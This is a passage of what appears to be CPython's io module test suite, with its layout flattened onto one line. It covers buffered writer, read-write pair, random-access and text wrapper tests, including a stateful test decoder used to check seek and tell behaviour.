self.check_writes(lambda bufio: bufio.flush()) def test_writes_and_seeks(self): def _seekabs(bufio): pos = bufio.tell() bufio.seek(pos + 1, 0) bufio.seek(pos - 1, 0) bufio.seek(pos, 0) self.check_writes(_seekabs) def _seekrel(bufio): pos = bufio.seek(0, 1) bufio.seek(+1, 1) bufio.seek(-1, 1) bufio.seek(pos, 0) self.check_writes(_seekrel) def test_writes_and_truncates(self): self.check_writes(lambda bufio: bufio.truncate(bufio.tell())) def test_write_non_blocking(self): raw = self.MockNonBlockWriterIO() bufio = self.tp(raw, 8) self.assertEqual(bufio.write(b"abcd"), 4) self.assertEqual(bufio.write(b"efghi"), 5) # 1 byte will be written, the rest will be buffered raw.block_on(b"k") self.assertEqual(bufio.write(b"jklmn"), 5) # 8 bytes will be written, 8 will be buffered and the rest will be lost raw.block_on(b"0") try: bufio.write(b"opqrwxyz0123456789") except self.BlockingIOError as e: written = e.characters_written else: self.fail("BlockingIOError should have been raised") self.assertEqual(written, 16) self.assertEqual(raw.pop_written(), b"abcdefghijklmnopqrwxyz") self.assertEqual(bufio.write(b"ABCDEFGHI"), 9) s = raw.pop_written() # Previously buffered bytes were flushed self.assertTrue(s.startswith(b"01234567A"), s) def test_write_and_rewind(self): raw = io.BytesIO() bufio = self.tp(raw, 4) self.assertEqual(bufio.write(b"abcdef"), 6) self.assertEqual(bufio.tell(), 6) bufio.seek(0, 0) self.assertEqual(bufio.write(b"XY"), 2) bufio.seek(6, 0) self.assertEqual(raw.getvalue(), b"XYcdef") self.assertEqual(bufio.write(b"123456"), 6) bufio.flush() self.assertEqual(raw.getvalue(), b"XYcdef123456") def test_flush(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") bufio.flush() self.assertEqual(b"abc", writer._write_stack[0]) def test_writelines(self): l = [b'ab', b'cd', b'ef'] writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.writelines(l) bufio.flush() self.assertEqual(b''.join(writer._write_stack), b'abcdef') def test_writelines_userlist(self): l = UserList([b'ab', b'cd', b'ef']) writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.writelines(l) bufio.flush() self.assertEqual(b''.join(writer._write_stack), b'abcdef') def test_writelines_error(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) self.assertRaises(TypeError, bufio.writelines, [1, 2, 3]) self.assertRaises(TypeError, bufio.writelines, None) self.assertRaises(TypeError, bufio.writelines, 'abc') def test_destructor(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") del bufio support.gc_collect() self.assertEqual(b"abc", writer._write_stack[0]) def test_truncate(self): # Truncate implicitly flushes the buffer. self.addCleanup(support.unlink, support.TESTFN) with self.open(support.TESTFN, self.write_mode, buffering=0) as raw: bufio = self.tp(raw, 8) bufio.write(b"abcdef") self.assertEqual(bufio.truncate(3), 3) self.assertEqual(bufio.tell(), 6) with self.open(support.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.read(), b"abc") def test_truncate_after_write(self): # Ensure that truncate preserves the file position after # writes longer than the buffer size. # Issue: https://bugs.python.org/issue32228 self.addCleanup(support.unlink, support.TESTFN) with self.open(support.TESTFN, "wb") as f: # Fill with some buffer f.write(b'\x00' * 10000) buffer_sizes = [8192, 4096, 200] for buffer_size in buffer_sizes: with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f: f.write(b'\x00' * (buffer_size + 1)) # After write write_pos and write_end are set to 0 f.read(1) # read operation makes sure that pos != raw_pos f.truncate() self.assertEqual(f.tell(), buffer_size + 2) @support.requires_resource('cpu') def test_threads(self): try: # Write out many bytes from many threads and test they were # all flushed. N = 1000 contents = bytes(range(256)) * N sizes = cycle([1, 19]) n = 0 queue = deque() while n < len(contents): size = next(sizes) queue.append(contents[n:n+size]) n += size del contents # We use a real file object because it allows us to # exercise situations where the GIL is released before # writing the buffer to the raw streams. This is in addition # to concurrency issues due to switching threads in the middle # of Python code. with self.open(support.TESTFN, self.write_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] def f(): try: while True: try: s = queue.popleft() except IndexError: return bufio.write(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with support.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) bufio.close() with self.open(support.TESTFN, "rb") as f: s = f.read() for i in range(256): self.assertEqual(s.count(bytes([i])), N) finally: support.unlink(support.TESTFN) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO() bufio = self.tp(rawio, 5) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) self.assertRaises(OSError, bufio.write, b"abcdef") # Silence destructor error bufio.close = lambda: None def test_max_buffer_size_removal(self): with self.assertRaises(TypeError): self.tp(self.MockRawIO(), 8, 12) def test_write_error_on_close(self): raw = self.MockRawIO() def bad_write(b): raise OSError() raw.write = bad_write b = self.tp(raw) b.write(b'spam') self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) def test_slow_close_from_thread(self): # Issue #31976 rawio = self.SlowFlushRawIO() bufio = self.tp(rawio, 8) t = threading.Thread(target=bufio.close) t.start() rawio.in_flush.wait() self.assertRaises(ValueError, bufio.write, b'spam') self.assertTrue(bufio.closed) t.join() class CBufferedWriterTest(BufferedWriterTest, SizeofTest): tp = io.BufferedWriter @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedWriterTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_initialization(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.write, b"def") self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.write, b"def") self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) self.assertRaises(ValueError, bufio.write, b"def") def test_garbage_collection(self): # C BufferedWriter objects are collected, and collecting them flushes # all data to disk. # The Python version has __del__, so it ends into gc.garbage instead self.addCleanup(support.unlink, support.TESTFN) with support.check_warnings(('', ResourceWarning)): rawio = self.FileIO(support.TESTFN, "w+b") f = self.tp(rawio) f.write(b"123xxx") f.x = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(support.TESTFN, "rb") as f: self.assertEqual(f.read(), b"123xxx") def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedWriter"): self.tp(io.BytesIO(), 1024, 1024, 1024) class PyBufferedWriterTest(BufferedWriterTest): tp = pyio.BufferedWriter class BufferedRWPairTest(unittest.TestCase): def test_constructor(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.closed) def test_uninitialized(self): pair = self.tp.__new__(self.tp) del pair pair = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', pair.read, 0) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', pair.write, b'') pair.__init__(self.MockRawIO(), self.MockRawIO()) self.assertEqual(pair.read(0), b'') self.assertEqual(pair.write(b''), 0) def test_detach(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertRaises(self.UnsupportedOperation, pair.detach) def test_constructor_max_buffer_size_removal(self): with self.assertRaises(TypeError): self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12) def test_constructor_with_not_readable(self): class NotReadable(MockRawIO): def readable(self): return False self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO()) def test_constructor_with_not_writeable(self): class NotWriteable(MockRawIO): def writable(self): return False self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable()) def test_read(self): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertEqual(pair.read(3), b"abc") self.assertEqual(pair.read(1), b"d") self.assertEqual(pair.read(), b"ef") pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO()) self.assertEqual(pair.read(None), b"abc") def test_readlines(self): pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO()) self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"]) self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"]) self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"]) def test_read1(self): # .read1() is delegated to the underlying reader object, so this test # can be shallow. pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertEqual(pair.read1(3), b"abc") self.assertEqual(pair.read1(), b"def") def test_readinto(self): for method in ("readinto", "readinto1"): with self.subTest(method): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) data = byteslike(b'\0' * 5) self.assertEqual(getattr(pair, method)(data), 5) self.assertEqual(bytes(data), b"abcde") def test_write(self): w = self.MockRawIO() pair = self.tp(self.MockRawIO(), w) pair.write(b"abc") pair.flush() buffer = bytearray(b"def") pair.write(buffer) buffer[:] = b"***" # Overwrite our copy of the data pair.flush() self.assertEqual(w._write_stack, [b"abc", b"def"]) def test_peek(self): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertTrue(pair.peek(3).startswith(b"abc")) self.assertEqual(pair.read(3), b"abc") def test_readable(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertTrue(pair.readable()) def test_writeable(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertTrue(pair.writable()) def test_seekable(self): # BufferedRWPairs are never seekable, even if their readers and writers # are. pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.seekable()) # .flush() is delegated to the underlying writer object and has been # tested in the test_write method. def test_close_and_closed(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.closed) pair.close() self.assertTrue(pair.closed) def test_reader_close_error_on_close(self): def reader_close(): reader_non_existing reader = self.MockRawIO() reader.close = reader_close writer = self.MockRawIO() pair = self.tp(reader, writer) with self.assertRaises(NameError) as err: pair.close() self.assertIn('reader_non_existing', str(err.exception)) self.assertTrue(pair.closed) self.assertFalse(reader.closed) self.assertTrue(writer.closed) # Silence destructor error reader.close = lambda: None def test_writer_close_error_on_close(self): def writer_close(): writer_non_existing reader = self.MockRawIO() writer = self.MockRawIO() writer.close = writer_close pair = self.tp(reader, writer) with self.assertRaises(NameError) as err: pair.close() self.assertIn('writer_non_existing', str(err.exception)) self.assertFalse(pair.closed) self.assertTrue(reader.closed) self.assertFalse(writer.closed) # Silence destructor error writer.close = lambda: None writer = None # Ignore BufferedWriter (of the BufferedRWPair) unraisable exception with support.catch_unraisable_exception(): # Ignore BufferedRWPair unraisable exception with support.catch_unraisable_exception(): pair = None support.gc_collect() support.gc_collect() def test_reader_writer_close_error_on_close(self): def reader_close(): reader_non_existing def writer_close(): writer_non_existing reader = self.MockRawIO() reader.close = reader_close writer = self.MockRawIO() writer.close = writer_close pair = self.tp(reader, writer) with self.assertRaises(NameError) as err: pair.close() self.assertIn('reader_non_existing', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('writer_non_existing', str(err.exception.__context__)) self.assertFalse(pair.closed) self.assertFalse(reader.closed) self.assertFalse(writer.closed) # Silence destructor error reader.close = lambda: None writer.close = lambda: None def test_isatty(self): class SelectableIsAtty(MockRawIO): def __init__(self, isatty): MockRawIO.__init__(self) self._isatty = isatty def isatty(self): return self._isatty pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False)) self.assertFalse(pair.isatty()) pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False)) self.assertTrue(pair.isatty()) pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True)) self.assertTrue(pair.isatty()) pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True)) self.assertTrue(pair.isatty()) def test_weakref_clearing(self): brw = self.tp(self.MockRawIO(), self.MockRawIO()) ref = weakref.ref(brw) brw = None ref = None # Shouldn't segfault. class CBufferedRWPairTest(BufferedRWPairTest): tp = io.BufferedRWPair class PyBufferedRWPairTest(BufferedRWPairTest): tp = pyio.BufferedRWPair class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest): read_mode = "rb+" write_mode = "wb+" def test_constructor(self): BufferedReaderTest.test_constructor(self) BufferedWriterTest.test_constructor(self) def test_uninitialized(self): BufferedReaderTest.test_uninitialized(self) BufferedWriterTest.test_uninitialized(self) def test_read_and_write(self): raw = self.MockRawIO((b"asdf", b"ghjk")) rw = self.tp(raw, 8) self.assertEqual(b"as", rw.read(2)) rw.write(b"ddd") rw.write(b"eee") self.assertFalse(raw._write_stack) # Buffer writes self.assertEqual(b"ghjk", rw.read()) self.assertEqual(b"dddeee", raw._write_stack[0]) def test_seek_and_tell(self): raw = self.BytesIO(b"asdfghjkl") rw = self.tp(raw) self.assertEqual(b"as", rw.read(2)) self.assertEqual(2, rw.tell()) rw.seek(0, 0) self.assertEqual(b"asdf", rw.read(4)) rw.write(b"123f") rw.seek(0, 0) self.assertEqual(b"asdf123fl", rw.read()) self.assertEqual(9, rw.tell()) rw.seek(-4, 2) self.assertEqual(5, rw.tell()) rw.seek(2, 1) self.assertEqual(7, rw.tell()) self.assertEqual(b"fl", rw.read(11)) rw.flush() self.assertEqual(b"asdf123fl", raw.getvalue()) self.assertRaises(TypeError, rw.seek, 0.0) def check_flush_and_read(self, read_func): raw = self.BytesIO(b"abcdefghi") bufio = self.tp(raw) self.assertEqual(b"ab", read_func(bufio, 2)) bufio.write(b"12") self.assertEqual(b"ef", read_func(bufio, 2)) self.assertEqual(6, bufio.tell()) bufio.flush() self.assertEqual(6, bufio.tell()) self.assertEqual(b"ghi", read_func(bufio)) raw.seek(0, 0) raw.write(b"XYZ") # flush() resets the read buffer bufio.flush() bufio.seek(0, 0) self.assertEqual(b"XYZ", read_func(bufio, 3)) def test_flush_and_read(self): self.check_flush_and_read(lambda bufio, *args: bufio.read(*args)) def test_flush_and_readinto(self): def _readinto(bufio, n=-1): b = bytearray(n if n >= 0 else 9999) n = bufio.readinto(b) return bytes(b[:n]) self.check_flush_and_read(_readinto) def test_flush_and_peek(self): def _peek(bufio, n=-1): # This relies on the fact that the buffer can contain the whole # raw stream, otherwise peek() can return less. b = bufio.peek(n) if n != -1: b = b[:n] bufio.seek(len(b), 1) return b self.check_flush_and_read(_peek) def test_flush_and_write(self): raw = self.BytesIO(b"abcdefghi") bufio = self.tp(raw) bufio.write(b"123") bufio.flush() bufio.write(b"45") bufio.flush() bufio.seek(0, 0) self.assertEqual(b"12345fghi", raw.getvalue()) self.assertEqual(b"12345fghi", bufio.read()) def test_threads(self): BufferedReaderTest.test_threads(self) BufferedWriterTest.test_threads(self) def test_writes_and_peek(self): def _peek(bufio): bufio.peek(1) self.check_writes(_peek) def _peek(bufio): pos = bufio.tell() bufio.seek(-1, 1) bufio.peek(1) bufio.seek(pos, 0) self.check_writes(_peek) def test_writes_and_reads(self): def _read(bufio): bufio.seek(-1, 1) bufio.read(1) self.check_writes(_read) def test_writes_and_read1s(self): def _read1(bufio): bufio.seek(-1, 1) bufio.read1(1) self.check_writes(_read1) def test_writes_and_readintos(self): def _read(bufio): bufio.seek(-1, 1) bufio.readinto(bytearray(1)) self.check_writes(_read) def test_write_after_readahead(self): # Issue #6629: writing after the buffer was filled by readahead should # first rewind the raw stream. for overwrite_size in [1, 5]: raw = self.BytesIO(b"A" * 10) bufio = self.tp(raw, 4) # Trigger readahead self.assertEqual(bufio.read(1), b"A") self.assertEqual(bufio.tell(), 1) # Overwriting should rewind the raw stream if it needs so bufio.write(b"B" * overwrite_size) self.assertEqual(bufio.tell(), overwrite_size + 1) # If the write size was smaller than the buffer size, flush() and # check that rewind happens. bufio.flush() self.assertEqual(bufio.tell(), overwrite_size + 1) s = raw.getvalue() self.assertEqual(s, b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size)) def test_write_rewind_write(self): # Various combinations of reading / writing / seeking backwards / writing again def mutate(bufio, pos1, pos2): assert pos2 >= pos1 # Fill the buffer bufio.seek(pos1) bufio.read(pos2 - pos1) bufio.write(b'\x02') # This writes earlier than the previous write, but still inside # the buffer. bufio.seek(pos1) bufio.write(b'\x01') b = b"\x80\x81\x82\x83\x84" for i in range(0, len(b)): for j in range(i, len(b)): raw = self.BytesIO(b) bufio = self.tp(raw, 100) mutate(bufio, i, j) bufio.flush() expected = bytearray(b) expected[j] = 2 expected[i] = 1 self.assertEqual(raw.getvalue(), expected, "failed result for i=%d, j=%d" % (i, j)) def test_truncate_after_read_or_write(self): raw = self.BytesIO(b"A" * 10) bufio = self.tp(raw, 100) self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled self.assertEqual(bufio.truncate(), 2) self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases self.assertEqual(bufio.truncate(), 4) def test_misbehaved_io(self): BufferedReaderTest.test_misbehaved_io(self) BufferedWriterTest.test_misbehaved_io(self) def test_interleaved_read_write(self): # Test for issue #12213 with self.BytesIO(b'abcdefgh') as raw: with self.tp(raw, 100) as f: f.write(b"1") self.assertEqual(f.read(1), b'b') f.write(b'2') self.assertEqual(f.read1(1), b'd') f.write(b'3') buf = bytearray(1) f.readinto(buf) self.assertEqual(buf, b'f') f.write(b'4') self.assertEqual(f.peek(1), b'h') f.flush() self.assertEqual(raw.getvalue(), b'1b2d3f4h') with self.BytesIO(b'abc') as raw: with self.tp(raw, 100) as f: self.assertEqual(f.read(1), b'a') f.write(b"2") self.assertEqual(f.read(1), b'c') f.flush() self.assertEqual(raw.getvalue(), b'a2c') def test_interleaved_readline_write(self): with self.BytesIO(b'ab\ncdef\ng\n') as raw: with self.tp(raw) as f: f.write(b'1') self.assertEqual(f.readline(), b'b\n') f.write(b'2') self.assertEqual(f.readline(), b'def\n') f.write(b'3') self.assertEqual(f.readline(), b'\n') f.flush() self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n') # You can't construct a BufferedRandom over a non-seekable stream. test_unseekable = None # writable() returns True, so there's no point to test it over # a writable stream. test_truncate_on_read_only = None class CBufferedRandomTest(BufferedRandomTest, SizeofTest): tp = io.BufferedRandom @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedRandomTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_garbage_collection(self): CBufferedReaderTest.test_garbage_collection(self) CBufferedWriterTest.test_garbage_collection(self) def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedRandom"): self.tp(io.BytesIO(), 1024, 1024, 1024) class PyBufferedRandomTest(BufferedRandomTest): tp = pyio.BufferedRandom # To fully exercise seek/tell, the StatefulIncrementalDecoder has these # properties: # - A single output character can correspond to many bytes of input. # - The number of input bytes to complete the character can be # undetermined until the last input byte is received. # - The number of input bytes can vary depending on previous input. # - A single input byte can correspond to many characters of output. # - The number of output characters can be undetermined until the # last input byte is received. # - The number of output characters can vary depending on previous input. class StatefulIncrementalDecoder(codecs.IncrementalDecoder): """ For testing seek/tell behavior with a stateful, buffering decoder. Input is a sequence of words. Words may be fixed-length (length set by input) or variable-length (period-terminated). In variable-length mode, extra periods are ignored. Possible words are: - 'i' followed by a number sets the input length, I (maximum 99). When I is set to 0, words are space-terminated. - 'o' followed by a number sets the output length, O (maximum 99). - Any other word is converted into a word followed by a period on the output. The output word consists of the input word truncated or padded out with hyphens to make its length equal to O. If O is 0, the word is output verbatim without truncating or padding. I and O are initially set to 1. When I changes, any buffered input is re-scanned according to the new I. EOF also terminates the last word. """ def __init__(self, errors='strict'): codecs.IncrementalDecoder.__init__(self, errors) self.reset() def __repr__(self): return '<SID %x>' % id(self) def reset(self): self.i = 1 self.o = 1 self.buffer = bytearray() def getstate(self): i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset() return bytes(self.buffer), i*100 + o def setstate(self, state): buffer, io = state self.buffer = bytearray(buffer) i, o = divmod(io, 100) self.i, self.o = i ^ 1, o ^ 1 def decode(self, input, final=False): output = '' for b in input: if self.i == 0: # variable-length, terminated with period if b == ord('.'): if self.buffer: output += self.process_word() else: self.buffer.append(b) else: # fixed-length, terminate after self.i bytes self.buffer.append(b) if len(self.buffer) == self.i: output += self.process_word() if final and self.buffer: # EOF terminates the last word output += self.process_word() return output def process_word(self): output = '' if self.buffer[0] == ord('i'): self.i = min(99, int(self.buffer[1:] or 0)) # set input length elif self.buffer[0] == ord('o'): self.o = min(99, int(self.buffer[1:] or 0)) # set output length else: output = self.buffer.decode('ascii') if len(output) < self.o: output += '-'*self.o # pad out with hyphens if self.o: output = output[:self.o] # truncate to output length output += '.' self.buffer = bytearray() return output codecEnabled = False @classmethod def lookupTestDecoder(cls, name): if cls.codecEnabled and name == 'test_decoder': latin1 = codecs.lookup('latin-1') return codecs.CodecInfo( name='test_decoder', encode=latin1.encode, decode=None, incrementalencoder=None, streamreader=None, streamwriter=None, incrementaldecoder=cls) # Register the previous decoder for testing. # Disabled by default, tests will enable it. codecs.register(StatefulIncrementalDecoder.lookupTestDecoder) class StatefulIncrementalDecoderTest(unittest.TestCase): """ Make sure the StatefulIncrementalDecoder actually works. """ test_cases = [ # I=1, O=1 (fixed-length input == fixed-length output) (b'abcd', False, 'a.b.c.d.'), # I=0, O=0 (variable-length input, variable-length output) (b'oiabcd', True, 'abcd.'), # I=0, O=0 (should ignore extra periods) (b'oi...abcd...', True, 'abcd.'), # I=0, O=6 (variable-length input, fixed-length output) (b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'), # I=2, O=6 (fixed-length input < fixed-length output) (b'i.i2.o6xyz', True, 'xy----.z-----.'), # I=6, O=3 (fixed-length input > fixed-length output) (b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'), # I=0, then 3; O=29, then 15 (with longer output) (b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True, 'a----------------------------.' + 'b----------------------------.' + 'cde--------------------------.' + 'abcdefghijabcde.' + 'a.b------------.' + '.c.------------.' + 'd.e------------.' + 'k--------------.' + 'l--------------.' + 'm--------------.') ] def test_decoder(self): # Try a few one-shot test cases. for input, eof, output in self.test_cases: d = StatefulIncrementalDecoder() self.assertEqual(d.decode(input, eof), output) # Also test an unfinished decode, followed by forcing EOF. d = StatefulIncrementalDecoder() self.assertEqual(d.decode(b'oiabcd'), '') self.assertEqual(d.decode(b'', 1), 'abcd.') class TextIOWrapperTest(unittest.TestCase): def setUp(self): self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n" self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii") support.unlink(support.TESTFN) def tearDown(self): support.unlink(support.TESTFN) def test_constructor(self): r = self.BytesIO(b"\xc3\xa9\n\n") b = self.BufferedReader(r, 1000) t = self.TextIOWrapper(b) t.__init__(b, encoding="latin-1", newline="\r\n") self.assertEqual(t.encoding, "latin-1") self.assertEqual(t.line_buffering, False) t.__init__(b, encoding="utf-8", line_buffering=True) self.assertEqual(t.encoding, "utf-8") self.assertEqual(t.line_buffering, True) self.assertEqual("\xe9\n", t.readline()) self.assertRaises(TypeError, t.__init__, b, newline=42) self.assertRaises(ValueError, t.__init__, b, newline='xyzzy') def test_uninitialized(self): t = self.TextIOWrapper.__new__(self.TextIOWrapper) del t t = self.TextIOWrapper.__new__(self.TextIOWrapper) self.assertRaises(Exception, repr, t) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', t.read, 0) t.__init__(self.MockRawIO()) self.assertEqual(t.read(0), '') def test_non_text_encoding_codecs_are_rejected(self): # Ensure the constructor complains if passed a codec that isn't # marked as a text encoding # http://bugs.python.org/issue20404 r = self.BytesIO() b = self.BufferedWriter(r) with self.assertRaisesRegex(LookupError, "is not a text encoding"): self.TextIOWrapper(b, encoding="hex") def test_detach(self): r = self.BytesIO() b = self.BufferedWriter(r) t = self.TextIOWrapper(b) self.assertIs(t.detach(), b) t = self.TextIOWrapper(b, encoding="ascii") t.write("howdy") self.assertFalse(r.getvalue()) t.detach() self.assertEqual(r.getvalue(), b"howdy") self.assertRaises(ValueError, t.detach) # Operations independent of the detached stream should still work repr(t) self.assertEqual(t.encoding, "ascii") self.assertEqual(t.errors, "strict") self.assertFalse(t.line_buffering) self.assertFalse(t.write_through) def test_repr(self): raw = self.BytesIO("hello".encode("utf-8")) b = self.BufferedReader(raw) t = self.TextIOWrapper(b, encoding="utf-8") modname = self.TextIOWrapper.__module__ self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname) raw.name = "dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname) t.mode = "r" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname) raw.name = b"dummy" self.assertRegex(repr(t), r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname) t.buffer.detach() repr(t) # Should not raise an exception def test_recursive_repr(self): # Issue #25455 raw = self.BytesIO() t = self.TextIOWrapper(raw) with support.swap_attr(raw, 'name', t): try: repr(t) # Should not crash except RuntimeError: pass def test_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=True) t.write("X") self.assertEqual(r.getvalue(), b"") # No flush happened t.write("Y\nZ") self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed t.write("A\rB") self.assertEqual(r.getvalue(), b"XY\nZA\rB") def test_reconfigure_line_buffering(self): r = self.BytesIO() b = self.BufferedWriter(r, 1000) t = self.TextIOWrapper(b, newline="\n", line_buffering=False) t.write("AB\nC") self.assertEqual(r.getvalue(), b"") t.reconfigure(line_buffering=True) # implicit flush self.assertEqual(r.getvalue(), b"AB\nC") t.write("DEF\nG") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.write("H") self.assertEqual(r.getvalue(), b"AB\nCDEF\nG") t.reconfigure(line_buffering=False) # implicit flush self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") t.write("IJ") self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH") # Keeping default value t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, False) t.reconfigure(line_buffering=True) t.reconfigure() t.reconfigure(line_buffering=None) self.assertEqual(t.line_buffering, True) @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_default_encoding(self): old_environ = dict(os.environ) try: # try to get a user preferred encoding different than the current # locale encoding to check that TextIOWrapper() uses the current # locale encoding and not the user preferred encoding for key in ('LC_ALL', 'LANG', 'LC_CTYPE'): if key in os.environ: del os.environ[key] current_locale_encoding = locale.getpreferredencoding(False) b = self.BytesIO() t = self.TextIOWrapper(b) self.assertEqual(t.encoding, current_locale_encoding) finally: os.environ.clear() os.environ.update(old_environ) @support.cpython_only @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled") def test_device_encoding(self): # Issue 15989 import _testcapi b = self.BytesIO() b.fileno = lambda: _testcapi.INT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) b.fileno = lambda: _testcapi.UINT_MAX + 1 self.assertRaises(OverflowError, self.TextIOWrapper, b) def test_encoding(self): # Check the encoding attribute is always set, and valid b = self.BytesIO() t = self.TextIOWrapper(b, encoding="utf-8") self.assertEqual(t.encoding, "utf-8") t = self.TextIOWrapper(b) self.assertIsNotNone(t.encoding) codecs.lookup(t.encoding) def test_encoding_errors_reading(self): # (1) default b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.read) # (2) explicit strict b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.read) # (3) ignore b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="ignore") self.assertEqual(t.read(), "abc\n\n") # (4) replace b = self.BytesIO(b"abc\n\xff\n") t = self.TextIOWrapper(b, encoding="ascii", errors="replace") self.assertEqual(t.read(), "abc\n\ufffd\n") def test_encoding_errors_writing(self): # (1) default b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.write, "\xff") # (2) explicit strict b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.write, "\xff") # (3) ignore b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="ignore", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abcdef\n") # (4) replace b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="replace", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abc?def\n") def test_newlines(self): input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ] tests = [ [ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ], [ '', input_lines ], [ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ], [ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ], [ '\r', [ "unix\nwindows\r", "\nos9\r", 